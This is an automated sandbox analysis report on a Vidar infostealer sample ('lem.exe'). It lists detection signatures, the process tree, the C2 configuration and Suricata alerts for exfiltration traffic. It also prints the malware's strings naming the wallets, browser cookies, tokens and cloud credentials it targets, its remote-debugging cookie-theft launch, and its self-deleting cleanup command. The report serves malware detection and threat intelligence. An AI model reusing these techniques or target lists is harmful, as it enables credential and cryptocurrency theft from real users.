Edit tour

Windows Analysis Report
lem.exe

Overview

General Information

Sample name:	lem.exe
Analysis ID:	1619387
MD5:	0c38e5cacc997db36aeb4678c1ddf3bc
SHA1:	30f528e119e699de15b48ea9365dc07a096a580f
SHA256:	62c09b2435ff52e29a56f8474f6307084383d73ecbf5dc62bd9767a23d50ec39
Tags:	exeopendiruser-skocherhan
Infos:

Detection

Vidar

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Attempt to bypass Chrome Application-Bound Encryption

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected Vidar stealer

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Monitors registry run keys for changes

Searches for specific processes (likely to inject)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Binary contains a suspicious time stamp

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to modify clipboard data

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to record screenshots

Contains functionality to retrieve information about pressed keystrokes

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops files with a non-matching file extension (content does not match file extension)

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

PE file contains executable resources (Code or Archives)

PE file does not import any functions

Potential key logger detected (key state polling based)

Queries information about the installed CPU (vendor, model number etc)

Queries keyboard layouts

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Browser Started with Remote Debugging

Sigma detected: Suspicious Execution From GUID Like Folder Names

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

lem.exe (PID: 3128 cmdline: "C:\Users\user\Desktop\lem.exe" MD5: 0C38E5CACC997DB36AEB4678C1DDF3BC)

lem.tmp (PID: 3200 cmdline: "C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp" /SL5="$20438,15291586,119296,C:\Users\user\Desktop\lem.exe" MD5: B1F9D665E52C29972B50D7145D88DCE1)

lem.exe (PID: 6564 cmdline: "C:\Users\user\Desktop\lem.exe" /VERYSILENT MD5: 0C38E5CACC997DB36AEB4678C1DDF3BC)

lem.tmp (PID: 2412 cmdline: "C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp" /SL5="$2043C,15291586,119296,C:\Users\user\Desktop\lem.exe" /VERYSILENT MD5: B1F9D665E52C29972B50D7145D88DCE1)

Start10ThemeEdit.exe (PID: 6488 cmdline: "C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe" allodial.a3x MD5: 130B120FF6433E3819F0C23701F68C22)

chrome.exe (PID: 3376 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 5424 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2320 --field-trial-handle=2296,i,2357709193393585783,5319373737350838943,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

msedge.exe (PID: 7596 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 7832 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2552 --field-trial-handle=2348,i,10661538599108609215,1196601915293608735,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

cmd.exe (PID: 1580 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe" & rd /s /q "C:\ProgramData\hvaa1" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 3360 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

msedge.exe (PID: 7896 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 8168 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2220 --field-trial-handle=1964,i,7716502631515619870,9430623312018008994,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 6820 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6732 --field-trial-handle=1964,i,7716502631515619870,9430623312018008994,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 4128 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=5888 --field-trial-handle=1964,i,7716502631515619870,9430623312018008994,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 3884 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7004 --field-trial-handle=1964,i,7716502631515619870,9430623312018008994,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": "https://steamcommunity.com/profiles/76561199828130190", "Botnet": "ot0yikam"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000006.00000003.3139258337.0000000002B91000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000006.00000002.3140989394.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000003.2451742401.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000006.00000003.2451630556.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000006.00000003.2465580145.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000006.00000003.3139766506.0000000002BA3000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: Start10ThemeEdit.exe PID: 6488	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: Start10ThemeEdit.exe PID: 6488	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 3 entries

Sigma Signatures

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe" allodial.a3x, ParentImage: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe, ParentProcessId: 6488, ParentProcessName: Start10ThemeEdit.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 3376, ProcessName: chrome.exe

Sigma detected: Suspicious Execution From GUID Like Folder Names

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe" & rd /s /q "C:\ProgramData\hvaa1" & exit, CommandLine: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe" & rd /s /q "C:\ProgramData\hvaa1" & exit, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe" allodial.a3x, ParentImage: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe, ParentProcessId: 6488, ParentProcessName: Start10ThemeEdit.exe, ProcessCommandLine: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe" & rd /s /q "C:\ProgramData\hvaa1" & exit, ProcessId: 1580, ProcessName: cmd.exe

Suricata Signatures

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-19T21:02:52.458400+0100	2044247	1	Malware Command and Control Activity Detected	116.202.180.73	443	192.168.2.5	49863	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-19T21:02:53.939224+0100	2051831	1	Malware Command and Control Activity Detected	116.202.180.73	443	192.168.2.5	49871	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-19T21:02:51.120843+0100	2049087	1	A Network Trojan was detected	192.168.2.5	49853	116.202.180.73	443	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-19T21:02:55.581314+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	49883	116.202.180.73	443	TCP
2025-02-19T21:02:56.613056+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	49892	116.202.180.73	443	TCP
2025-02-19T21:03:04.860712+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	49964	116.202.180.73	443	TCP
2025-02-19T21:03:05.363925+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	49977	116.202.180.73	443	TCP
2025-02-19T21:03:06.442827+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	49985	116.202.180.73	443	TCP
2025-02-19T21:03:07.495386+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	49994	116.202.180.73	443	TCP
2025-02-19T21:03:09.228435+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50000	116.202.180.73	443	TCP
2025-02-19T21:03:15.463256+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50051	116.202.180.73	443	TCP
2025-02-19T21:03:16.089403+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50058	116.202.180.73	443	TCP
2025-02-19T21:03:17.036102+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50067	116.202.180.73	443	TCP
2025-02-19T21:03:19.027498+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50095	116.202.180.73	443	TCP
2025-02-19T21:03:20.223344+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50107	116.202.180.73	443	TCP
2025-02-19T21:03:21.246353+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50117	116.202.180.73	443	TCP
2025-02-19T21:03:23.332901+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50122	116.202.180.73	443	TCP
2025-02-19T21:03:28.308149+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50131	116.202.180.73	443	TCP
2025-02-19T21:03:30.816299+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50135	116.202.180.73	443	TCP
2025-02-19T21:03:41.653514+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50140	116.202.180.73	443	TCP
2025-02-19T21:03:42.584836+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50141	116.202.180.73	443	TCP
2025-02-19T21:03:43.583247+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50142	116.202.180.73	443	TCP
2025-02-19T21:03:44.582198+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50143	116.202.180.73	443	TCP
2025-02-19T21:03:45.509132+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50144	116.202.180.73	443	TCP
2025-02-19T21:03:46.650727+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50145	116.202.180.73	443	TCP
2025-02-19T21:03:47.953573+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50146	116.202.180.73	443	TCP
2025-02-19T21:03:48.858287+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50147	116.202.180.73	443	TCP
2025-02-19T21:03:49.758524+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50148	116.202.180.73	443	TCP
2025-02-19T21:03:50.722297+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50149	116.202.180.73	443	TCP
2025-02-19T21:03:51.785047+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50150	116.202.180.73	443	TCP
2025-02-19T21:03:52.956927+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50151	116.202.180.73	443	TCP
2025-02-19T21:03:53.899085+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50152	116.202.180.73	443	TCP
2025-02-19T21:03:54.914314+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50153	116.202.180.73	443	TCP
2025-02-19T21:03:56.108876+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.5	50154	116.202.180.73	443	TCP

ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-19T21:03:05.363925+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.5	49977	116.202.180.73	443	TCP
2025-02-19T21:03:06.442827+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.5	49985	116.202.180.73	443	TCP
2025-02-19T21:03:07.495386+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.5	49994	116.202.180.73	443	TCP
2025-02-19T21:03:16.089403+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.5	50058	116.202.180.73	443	TCP
2025-02-19T21:03:17.036102+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.5	50067	116.202.180.73	443	TCP
2025-02-19T21:03:19.027498+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.5	50095	116.202.180.73	443	TCP
2025-02-19T21:03:20.223344+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.5	50107	116.202.180.73	443	TCP
2025-02-19T21:03:21.246353+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.5	50117	116.202.180.73	443	TCP
2025-02-19T21:03:23.332901+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.5	50122	116.202.180.73	443	TCP

ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-19T21:02:49.779972+0100	2859378	1	Malware Command and Control Activity Detected	192.168.2.5	49842	116.202.180.73	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://www.0e0.jp.eu.org/ntent	Avira URL Cloud: Label: malware
Source: https://www.0e0.jp.eu.org/Tc#&	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000006.00000003.3139258337.0000000002B91000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199828130190", "Botnet": "ot0yikam"}

Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_3_02A15FE7 CryptUnprotectData,LocalAlloc,LocalFree,		6_3_02A15FE7
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_3_02A1E7E9 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,GetLastError,GetProcessHeap,HeapFree,		6_3_02A1E7E9

Source: lem.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: unknown

HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49975 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49825 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 116.202.180.73:443 -> 192.168.2.5:49832 version: TLS 1.2

Source: lem.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: A{"id":1,"method":"Storage.getCookies"}\|.tgz.gzSecurityHistoryWork Dir: In memorySOFTWARE\Microsoft\Cryptographyfirefox%08lX%04lX%lu_key.txtSoft\Steam\steam_tokens.txt\Discord\tokens.txtpasswords.txtinformation.txtlocalhostWebSocketClient" & exitGdipGetImageHeightSoftGdipGetImagePixelFormatN0ZWFt\Monero\wallet.keysAzure\.awsstatusWallets_CreateProcessGdipGetImageEncodershttpsSoftware\Martin Prikryl\WinSCP 2\SessionsPlugins/devtoolsprefs.jsLocal Extension SettingsSync Extension SettingsFilescookiesCookies\BraveWallet\Preferenceskey_datas%s\%s\%sPortNumberCurrentBuildNumberGdiplusStartup.zipGdipCreateHBITMAPFromBitmapOpera Crypto.zooUnknownGdiplusShutdown/json_logins.jsoninvalid string positionSoftware\Martin Prikryl\WinSCP 2\ConfigurationDisplayVersionSOFTWARE\Microsoft\Windows NT\CurrentVersionopentokenamcommunity.comTelegramSoftware\Valve\SteamGdipSaveImageToStreamGdipLoadImageFromStream\AppData\Roaming\FileZilla\recentservers.xml.dllSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstallapprove_aprilNetworkblock.arjprofiles.ini.lzhGdipGetImageWidthwallet_pathSteamPathscreenshot.jpgstring too longvector<T> too longProcessorNameStringloginusers.vdflibraryfolders.vdfconfig.vdfDialogConfig.vdfDialogConfigOverlay*.vdfGdipGetImageEncodersSizesteam.exeC:\Windows\system32\cmd.exeC:\Windows\system32\rundll32.exeBravetrueformhistory.sqlitecookies.sqliteplaces.sqliteLocal StatefalseAzure\.azureSOFTWARE\monero-project\monero-corechromefile_nameDisplayNameHostNameProductNameUserNameGdipSaveImageToFilemsal.cacheGdipDisposeImagemodeAzure\.IdentityServiceUseMasterPasswordhwidMachineGuidtask_idbuild_idCrash DetectedDisabled%dx%d%d/%d/%d %d:%d:%d.arcvdr1.pdb\Local Storage\leveldb_0.indexeddb.leveldb_formhistory.db_history.db_cookies.db_passwords.db_webdata.db_key4.db\key4.dbfile_dataLogin DataWeb DataoperaOperachrome-extension_[Processes][Software]\storage\default\\.aws\errors\\Telegram Desktop\\Steam\\config\\.azure\ Stable\\.IdentityService\\discord\/c timeout /t 10 & rd /s /q "C:\ProgramData\" & rd /s /q "C:\ProgramData\\..\.ZDISPLAYOpera GXEXCEPTION_INT_OVERFLOWEXCEPTION_FLT_OVERFLOWEXCEPTION_STACK_OVERFLOWEXCEPTION_FLT_UNDERFLOWPOSTEXCEPTION_BREAKPOINT\Local Storage\leveldb\CURRENTEXCEPTION_DATATYPE_MISALIGNMENTEXCEPTION_FLT_INEXACT_RESULTGETEXCEPTION_IN_PAGE_ERRORdQw4w9WgXcQEXCEPTION_SINGLE_STEPGdipCreateBitmapFromHBITMAPEXCEPTION_INT_DIVIDE_BY_ZEROEXCEPTION_FLT_DIVIDE_BY_ZEROEXCEPTION_NONCONTINUABLE_EXCEPTIONUNKNOWN EXCEPTIONEXCEPTION_INVALID_DISPOSITIONEXCEPTION_PRIV_INSTRUCTIONEXCEPTION_ILLEGAL_INSTRUCTIONEXCEPTION_FLT_INVALID_OPERATIONEXCEPTION_ACCESS_VIOLATIONEXCEPTION_FLT_STACK_CHECKEXCEPTION_FLT_DENORMAL_OPERANDEXCEPTION_ARRAY_BOUNDS_EXCEEDED%d MBIndexedDBOCALAPPDATA?<Host><Port><User><Pass encoding="base64">http://localhost:"webSocketDebuggerUrl":6^userContextId=4294967295465 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73ws://localhost:9223.metadata-v2comctl32gdi32:225121Windows 11HTTP/1.1HARDWARE\DESCRIPTION\System\CentralProcessor\0abcdefgh
Source:	Binary string: C:\Users\Administrator\Desktop\vdr1\Release\vdr1.pdbA source: Start10ThemeEdit.exe, 00000006.00000003.3139258337.0000000002B91000.00000004.00000020.00020000.00000000.sdmp, Start10ThemeEdit.exe, 00000006.00000003.3139164595.0000000002A29000.00000002.00001000.00020000.00000000.sdmp, Start10ThemeEdit.exe, 00000006.00000003.3139766506.0000000002BA3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: /_/artifacts/obj/PresentationBuildTasks/Release/net7.0/PresentationBuildTasks.pdb source: is-UGTIU.tmp.3.dr
Source:	Binary string: vdr1.pdb source: Start10ThemeEdit.exe, 00000006.00000003.3139258337.0000000002B91000.00000004.00000020.00020000.00000000.sdmp, Start10ThemeEdit.exe, 00000006.00000003.3139164595.0000000002A29000.00000002.00001000.00020000.00000000.sdmp, Start10ThemeEdit.exe, 00000006.00000003.3139766506.0000000002BA3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\obj\Microsoft.Developer.IdentityService.csproj\x64\Release\net6.0-windows10.0.18362\win-x64\Microsoft.Developer.IdentityService.pdb source: is-CJI5N.tmp.3.dr
Source:	Binary string: cryptosetup.pdbGCTL source: Start10ThemeEdit.exe, 00000006.00000002.3143046149.0000000003D00000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: cryptosetup.pdb source: Start10ThemeEdit.exe, 00000006.00000002.3143046149.0000000003D00000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 1.pdb\ source: Start10ThemeEdit.exe, 00000006.00000003.3139258337.0000000002B91000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: PresentationBuildTasks.ni.pdb source: is-UGTIU.tmp.3.dr
Source:	Binary string: D:\dbs\sh\ddvsm\1002_165500_0\cmd\r\out\Intermediate\vc\microsoft.visualstudio.cmake.project_x86retail_CCEBE852\Release\net472\Microsoft.VisualStudio.CMake.Project.pdb source: is-UGAPQ.tmp.3.dr
Source:	Binary string: D:\dbs\sh\ddvsm\1002_165500_0\cmd\r\out\Intermediate\vc\microsoft.visualstudio.cmake.project_x86retail_CCEBE852\Release\net472\Microsoft.VisualStudio.CMake.Project.pdbT source: is-UGAPQ.tmp.3.dr
Source:	Binary string: D:\a\_work\1\obj\Release.AnyCPU\VSIntegration.Client\MS.TF.WorkItemTracking.Controls\Microsoft.TeamFoundation.WorkItemTracking.Controls.pdbx source: is-BOMU6.tmp.3.dr
Source:	Binary string: Microsoft.Developer.IdentityService.ni.pdb source: is-CJI5N.tmp.3.dr
Source:	Binary string: 1.pdb source: Start10ThemeEdit.exe, 00000006.00000003.3139258337.0000000002B91000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\obj\Release.AnyCPU\VSIntegration.Client\MS.TF.WorkItemTracking.Controls\Microsoft.TeamFoundation.WorkItemTracking.Controls.pdb source: is-BOMU6.tmp.3.dr
Source:	Binary string: C:\Users\Administrator\Desktop\vdr1\Release\vdr1.pdb source: Start10ThemeEdit.exe, 00000006.00000003.3139258337.0000000002B91000.00000004.00000020.00020000.00000000.sdmp, Start10ThemeEdit.exe, 00000006.00000003.3139164595.0000000002A29000.00000002.00001000.00020000.00000000.sdmp, Start10ThemeEdit.exe, 00000006.00000003.3139766506.0000000002BA3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: {"id":1,"method":"Storage.getCookies"}\|.tgz.gzSecurityHistoryWork Dir: In memorySOFTWARE\Microsoft\Cryptographyfirefox%08lX%04lX%lu_key.txtSoft\Steam\steam_tokens.txt\Discord\tokens.txtpasswords.txtinformation.txtlocalhostWebSocketClient" & exitGdipGetImageHeightSoftGdipGetImagePixelFormatN0ZWFt\Monero\wallet.keysAzure\.awsstatusWallets_CreateProcessGdipGetImageEncodershttpsSoftware\Martin Prikryl\WinSCP 2\SessionsPlugins/devtoolsprefs.jsLocal Extension SettingsSync Extension SettingsFilescookiesCookies\BraveWallet\Preferenceskey_datas%s\%s\%sPortNumberCurrentBuildNumberGdiplusStartup.zipGdipCreateHBITMAPFromBitmapOpera Crypto.zooUnknownGdiplusShutdown/json_logins.jsoninvalid string positionSoftware\Martin Prikryl\WinSCP 2\ConfigurationDisplayVersionSOFTWARE\Microsoft\Windows NT\CurrentVersionopentokenamcommunity.comTelegramSoftware\Valve\SteamGdipSaveImageToStreamGdipLoadImageFromStream\AppData\Roaming\FileZilla\recentservers.xml.dllSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstallapprove_aprilNetworkblock.arjprofiles.ini.lzhGdipGetImageWidthwallet_pathSteamPathscreenshot.jpgstring too longvector<T> too longProcessorNameStringloginusers.vdflibraryfolders.vdfconfig.vdfDialogConfig.vdfDialogConfigOverlay*.vdfGdipGetImageEncodersSizesteam.exeC:\Windows\system32\cmd.exeC:\Windows\system32\rundll32.exeBravetrueformhistory.sqlitecookies.sqliteplaces.sqliteLocal StatefalseAzure\.azureSOFTWARE\monero-project\monero-corechromefile_nameDisplayNameHostNameProductNameUserNameGdipSaveImageToFilemsal.cacheGdipDisposeImagemodeAzure\.IdentityServiceUseMasterPasswordhwidMachineGuidtask_idbuild_idCrash DetectedDisabled%dx%d%d/%d/%d %d:%d:%d.arcvdr1.pdb\Local Storage\leveldb_0.indexeddb.leveldb_formhistory.db_history.db_cookies.db_passwords.db_webdata.db_key4.db\key4.dbfile_dataLogin DataWeb DataoperaOperachrome-extension_[Processes][Software]\storage\default\\.aws\errors\\Telegram Desktop\\Steam\\config\\.azure\ Stable\\.IdentityService\\discord\/c timeout /t 10 & rd /s /q "C:\ProgramData\" & rd /s /q "C:\ProgramData\\..\.ZDISPLAYOpera 